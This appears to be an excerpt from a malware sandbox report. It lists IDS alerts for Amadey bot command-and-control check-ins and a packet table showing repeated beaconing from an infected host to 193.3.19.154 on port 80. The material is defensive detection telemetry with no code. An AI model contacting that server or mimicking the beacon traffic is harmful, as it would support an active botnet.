                  2024-11-22T23:02:31.704018+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449750193.3.19.15480TCP
                  2024-11-22T23:02:35.938261+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449751193.3.19.15480TCP
                  2024-11-22T23:02:35.938261+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449751193.3.19.15480TCP
                  2024-11-22T23:02:35.938386+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449752193.3.19.15480TCP
                  2024-11-22T23:02:40.172631+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449753193.3.19.15480TCP
                  2024-11-22T23:02:40.172631+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449753193.3.19.15480TCP
                  2024-11-22T23:02:44.428618+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449755193.3.19.15480TCP
                  2024-11-22T23:02:44.428618+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449755193.3.19.15480TCP
                  2024-11-22T23:02:48.657050+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449766193.3.19.15480TCP
                  2024-11-22T23:02:48.657050+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449766193.3.19.15480TCP
                  2024-11-22T23:02:52.891608+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449775193.3.19.15480TCP
                  2024-11-22T23:02:52.891608+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449775193.3.19.15480TCP
                  2024-11-22T23:02:57.141702+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449784193.3.19.15480TCP
                  2024-11-22T23:02:57.141702+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449784193.3.19.15480TCP
                  2024-11-22T23:03:01.360558+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449795193.3.19.15480TCP
                  2024-11-22T23:03:01.360558+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449795193.3.19.15480TCP
                  2024-11-22T23:03:05.657214+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449806193.3.19.15480TCP
                  2024-11-22T23:03:05.657214+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449806193.3.19.15480TCP
                  2024-11-22T23:03:09.891778+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449817193.3.19.15480TCP
                  2024-11-22T23:03:09.891778+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449817193.3.19.15480TCP
                  2024-11-22T23:03:14.113332+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449828193.3.19.15480TCP
                  2024-11-22T23:03:14.113332+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449828193.3.19.15480TCP
                  2024-11-22T23:03:18.344757+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449839193.3.19.15480TCP
                  2024-11-22T23:03:18.344757+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449839193.3.19.15480TCP
                  2024-11-22T23:03:22.579523+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449848193.3.19.15480TCP
                  2024-11-22T23:03:22.579523+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449848193.3.19.15480TCP
                  2024-11-22T23:03:26.813624+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449858193.3.19.15480TCP
                  2024-11-22T23:03:26.813624+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449858193.3.19.15480TCP
                  2024-11-22T23:03:31.047873+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449867193.3.19.15480TCP
                  2024-11-22T23:03:31.047873+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449867193.3.19.15480TCP
                  2024-11-22T23:03:44.704283+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449878193.3.19.15480TCP
                  2024-11-22T23:03:44.704283+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449878193.3.19.15480TCP
                  2024-11-22T23:03:48.941303+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449909193.3.19.15480TCP
                  2024-11-22T23:03:48.941303+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449909193.3.19.15480TCP
                  2024-11-22T23:03:53.173110+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449920193.3.19.15480TCP
                  2024-11-22T23:03:53.173110+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449920193.3.19.15480TCP
                  2024-11-22T23:03:57.545622+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449931193.3.19.15480TCP
                  2024-11-22T23:03:57.545622+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449931193.3.19.15480TCP
                  2024-11-22T23:04:01.829258+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449942193.3.19.15480TCP
                  2024-11-22T23:04:01.829258+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449942193.3.19.15480TCP
                  2024-11-22T23:04:06.063658+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449953193.3.19.15480TCP
                  2024-11-22T23:04:06.063658+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449953193.3.19.15480TCP
                  2024-11-22T23:04:10.282475+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449964193.3.19.15480TCP
                  2024-11-22T23:04:10.282475+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449964193.3.19.15480TCP
                  2024-11-22T23:04:14.517079+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449973193.3.19.15480TCP
                  2024-11-22T23:04:14.517079+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449973193.3.19.15480TCP
                  2024-11-22T23:04:18.751433+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449981193.3.19.15480TCP
                  2024-11-22T23:04:18.751433+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449981193.3.19.15480TCP
                  2024-11-22T23:04:23.016897+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.449992193.3.19.15480TCP
                  2024-11-22T23:04:23.016897+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.449992193.3.19.15480TCP
                  2024-11-22T23:04:27.251214+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450003193.3.19.15480TCP
                  2024-11-22T23:04:27.251214+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450003193.3.19.15480TCP
                  2024-11-22T23:04:31.485699+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450013193.3.19.15480TCP
                  2024-11-22T23:04:31.485699+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450013193.3.19.15480TCP
                  2024-11-22T23:04:35.704474+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450024193.3.19.15480TCP
                  2024-11-22T23:04:35.704474+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450024193.3.19.15480TCP
                  2024-11-22T23:04:39.954324+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450035193.3.19.15480TCP
                  2024-11-22T23:04:39.954324+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450035193.3.19.15480TCP
                  2024-11-22T23:04:44.188956+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450044193.3.19.15480TCP
                  2024-11-22T23:04:44.188956+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450044193.3.19.15480TCP
                  2024-11-22T23:04:48.439563+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450047193.3.19.15480TCP
                  2024-11-22T23:04:48.439563+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450047193.3.19.15480TCP
                  2024-11-22T23:04:52.673519+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450048193.3.19.15480TCP
                  2024-11-22T23:04:52.673519+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450048193.3.19.15480TCP
                  2024-11-22T23:04:56.908147+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450049193.3.19.15480TCP
                  2024-11-22T23:04:56.908147+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450049193.3.19.15480TCP
                  2024-11-22T23:05:01.157745+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450050193.3.19.15480TCP
                  2024-11-22T23:05:01.157745+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450050193.3.19.15480TCP
                  2024-11-22T23:05:05.392163+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450051193.3.19.15480TCP
                  2024-11-22T23:05:05.392163+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450051193.3.19.15480TCP
                  2024-11-22T23:05:09.626401+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450052193.3.19.15480TCP
                  2024-11-22T23:05:09.626401+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450052193.3.19.15480TCP
                  2024-11-22T23:05:13.861186+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450053193.3.19.15480TCP
                  2024-11-22T23:05:13.861186+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450053193.3.19.15480TCP
                  2024-11-22T23:05:18.095204+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450054193.3.19.15480TCP
                  2024-11-22T23:05:18.095204+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450054193.3.19.15480TCP
                  2024-11-22T23:05:22.350850+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450055193.3.19.15480TCP
                  2024-11-22T23:05:22.350850+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450055193.3.19.15480TCP
                  2024-11-22T23:05:26.610715+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450056193.3.19.15480TCP
                  2024-11-22T23:05:26.610715+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450056193.3.19.15480TCP
                  2024-11-22T23:05:30.845218+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450057193.3.19.15480TCP
                  2024-11-22T23:05:30.845218+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450057193.3.19.15480TCP
                  2024-11-22T23:05:35.097657+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450058193.3.19.15480TCP
                  2024-11-22T23:05:35.097657+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450058193.3.19.15480TCP
                  2024-11-22T23:05:39.317669+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450059193.3.19.15480TCP
                  2024-11-22T23:05:39.317669+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450059193.3.19.15480TCP
                  2024-11-22T23:05:43.548366+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450060193.3.19.15480TCP
                  2024-11-22T23:05:43.548366+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450060193.3.19.15480TCP
                  2024-11-22T23:05:47.767633+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450061193.3.19.15480TCP
                  2024-11-22T23:05:47.767633+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450061193.3.19.15480TCP
                  2024-11-22T23:05:52.004667+01002027700ET MALWARE Amadey CnC Check-In1192.168.2.450062193.3.19.15480TCP
                  2024-11-22T23:05:52.004667+01002045751ET MALWARE Win32/Amadey Bot Activity (POST) M21192.168.2.450062193.3.19.15480TCP
                  TimestampSource PortDest PortSource IPDest IP
                  Nov 22, 2024 23:01:49.628585100 CET4973080192.168.2.4193.3.19.154
                  Nov 22, 2024 23:01:49.629317045 CET4973180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:01:49.748321056 CET8049730193.3.19.154192.168.2.4
                  Nov 22, 2024 23:01:49.748414040 CET4973080192.168.2.4193.3.19.154
                  Nov 22, 2024 23:01:49.748624086 CET4973080192.168.2.4193.3.19.154
                  Nov 22, 2024 23:01:49.748878956 CET8049731193.3.19.154192.168.2.4
                  Nov 22, 2024 23:01:49.749006987 CET4973180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:01:49.749084949 CET4973180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:01:49.868117094 CET8049730193.3.19.154192.168.2.4
                  Nov 22, 2024 23:01:49.868542910 CET8049731193.3.19.154192.168.2.4
                  Nov 22, 2024 23:01:53.630805016 CET4973080192.168.2.4193.3.19.154
                  Nov 22, 2024 23:01:53.631927967 CET4973180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:01:53.752497911 CET4973280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:01:53.872020960 CET8049732193.3.19.154192.168.2.4
                  Nov 22, 2024 23:01:53.872123003 CET4973280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:01:53.872288942 CET4973280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:01:53.991810083 CET8049732193.3.19.154192.168.2.4
                  Nov 22, 2024 23:01:57.875818968 CET4973280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:01:57.988127947 CET4973380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:01:58.108074903 CET8049733193.3.19.154192.168.2.4
                  Nov 22, 2024 23:01:58.108370066 CET4973380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:01:58.108654022 CET4973380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:01:58.228135109 CET8049733193.3.19.154192.168.2.4
                  Nov 22, 2024 23:01:58.657727957 CET4973480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:01:58.777448893 CET8049734193.3.19.154192.168.2.4
                  Nov 22, 2024 23:01:58.777652979 CET4973480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:01:58.777911901 CET4973480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:01:58.897564888 CET8049734193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:02.094611883 CET4973380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:02.094615936 CET4973480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:02.207212925 CET4973580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:02.327079058 CET8049735193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:02.327230930 CET4973580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:02.327446938 CET4973580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:02.447119951 CET8049735193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:06.329029083 CET4973580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:06.442130089 CET4973780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:06.561777115 CET8049737193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:06.561893940 CET4973780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:06.562109947 CET4973780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:06.681605101 CET8049737193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:07.110840082 CET4973980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:07.230732918 CET8049739193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:07.230842113 CET4973980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:07.231005907 CET4973980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:07.350564957 CET8049739193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:10.547661066 CET4973980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:10.547760010 CET4973780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:10.657772064 CET4974280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:10.777371883 CET8049742193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:10.777508974 CET4974280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:10.777719975 CET4974280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:10.897156954 CET8049742193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:14.766325951 CET4974280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:14.878973007 CET4974580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:14.998600960 CET8049745193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:14.998905897 CET4974580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:14.999185085 CET4974580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:15.118693113 CET8049745193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:15.579031944 CET4974680192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:15.698724031 CET8049746193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:15.698942900 CET4974680192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:15.699085951 CET4974680192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:15.818614006 CET8049746193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:19.003985882 CET4974580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:19.004101038 CET4974680192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:19.110941887 CET4974780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:19.230768919 CET8049747193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:19.230910063 CET4974780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:19.231146097 CET4974780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:19.350619078 CET8049747193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:23.236151934 CET4974780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:23.347423077 CET4974880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:23.467056036 CET8049748193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:23.467179060 CET4974880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:23.467364073 CET4974880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:23.587944984 CET8049748193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:24.017003059 CET4974980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:24.136847973 CET8049749193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:24.137005091 CET4974980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:24.137197018 CET4974980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:24.256700993 CET8049749193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:27.476780891 CET4974980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:27.476830006 CET4974880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:27.581760883 CET4975080192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:27.702086926 CET8049750193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:27.702327967 CET4975080192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:27.702537060 CET4975080192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:27.822140932 CET8049750193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:31.704018116 CET4975080192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:31.816598892 CET4975180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:31.936563969 CET8049751193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:31.936749935 CET4975180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:31.936975956 CET4975180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:32.056668997 CET8049751193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:32.491291046 CET4975280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:32.611124992 CET8049752193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:32.611305952 CET4975280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:32.648214102 CET4975280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:32.767884016 CET8049752193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:35.938261032 CET4975180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:35.938385963 CET4975280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:36.048470974 CET4975380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:36.168528080 CET8049753193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:36.168637991 CET4975380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:36.169647932 CET4975380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:36.289199114 CET8049753193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:40.172631025 CET4975380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:40.297564030 CET4975580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:40.417481899 CET8049755193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:40.417676926 CET4975580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:40.418342113 CET4975580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:40.537878990 CET8049755193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:44.428617954 CET4975580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:44.533211946 CET4976680192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:44.654247046 CET8049766193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:44.654386044 CET4976680192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:44.654630899 CET4976680192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:44.774225950 CET8049766193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:48.657049894 CET4976680192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:48.768798113 CET4977580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:48.888768911 CET8049775193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:48.888879061 CET4977580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:48.889089108 CET4977580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:49.008615971 CET8049775193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:52.891608000 CET4977580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:53.017227888 CET4978480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:53.136930943 CET8049784193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:53.137155056 CET4978480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:53.137406111 CET4978480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:53.256870985 CET8049784193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:57.141701937 CET4978480192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:57.253987074 CET4979580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:57.373831987 CET8049795193.3.19.154192.168.2.4
                  Nov 22, 2024 23:02:57.373915911 CET4979580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:57.374092102 CET4979580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:02:57.495467901 CET8049795193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:01.360558033 CET4979580192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:01.472546101 CET4980680192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:01.647692919 CET8049806193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:01.647795916 CET4980680192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:01.647985935 CET4980680192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:01.805717945 CET8049806193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:05.657213926 CET4980680192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:05.768879890 CET4981780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:05.888582945 CET8049817193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:05.888711929 CET4981780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:05.888936043 CET4981780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:06.008445024 CET8049817193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:09.891777992 CET4981780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:10.003685951 CET4982880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:10.123986006 CET8049828193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:10.124131918 CET4982880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:10.124281883 CET4982880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:10.243743896 CET8049828193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:14.113332033 CET4982880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:14.224224091 CET4983980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:14.343885899 CET8049839193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:14.344028950 CET4983980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:14.344291925 CET4983980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:14.463934898 CET8049839193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:18.344757080 CET4983980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:18.456516981 CET4984880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:18.577773094 CET8049848193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:18.579493046 CET4984880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:18.579659939 CET4984880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:18.699166059 CET8049848193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:22.579523087 CET4984880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:22.691306114 CET4985880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:22.810839891 CET8049858193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:22.811070919 CET4985880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:22.811232090 CET4985880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:22.930710077 CET8049858193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:26.813623905 CET4985880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:26.925579071 CET4986780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:27.045154095 CET8049867193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:27.045242071 CET4986780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:27.045433998 CET4986780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:27.165082932 CET8049867193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:31.047873020 CET4986780192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:31.162137032 CET4987880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:31.281738043 CET8049878193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:31.281831980 CET4987880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:31.282150030 CET4987880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:31.401727915 CET8049878193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:44.704282999 CET4987880192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:44.817886114 CET4990980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:44.937530994 CET8049909193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:44.937666893 CET4990980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:44.937906981 CET4990980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:45.057671070 CET8049909193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:48.941303015 CET4990980192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:49.053298950 CET4992080192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:49.172924042 CET8049920193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:49.173010111 CET4992080192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:49.173223019 CET4992080192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:49.293596983 CET8049920193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:53.173110008 CET4992080192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:53.285933018 CET4993180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:53.405692101 CET8049931193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:53.405774117 CET4993180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:53.405967951 CET4993180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:53.525551081 CET8049931193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:57.545622110 CET4993180192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:57.704195976 CET4994280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:57.824415922 CET8049942193.3.19.154192.168.2.4
                  Nov 22, 2024 23:03:57.824502945 CET4994280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:57.824795008 CET4994280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:03:57.944765091 CET8049942193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:01.829257965 CET4994280192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:01.941828012 CET4995380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:02.061515093 CET8049953193.3.19.154192.168.2.4
                  Nov 22, 2024 23:04:02.061600924 CET4995380192.168.2.4193.3.19.154
                  Nov 22, 2024 23:04:02.061980963 CET4995380192.168.2.4193.3.19.154
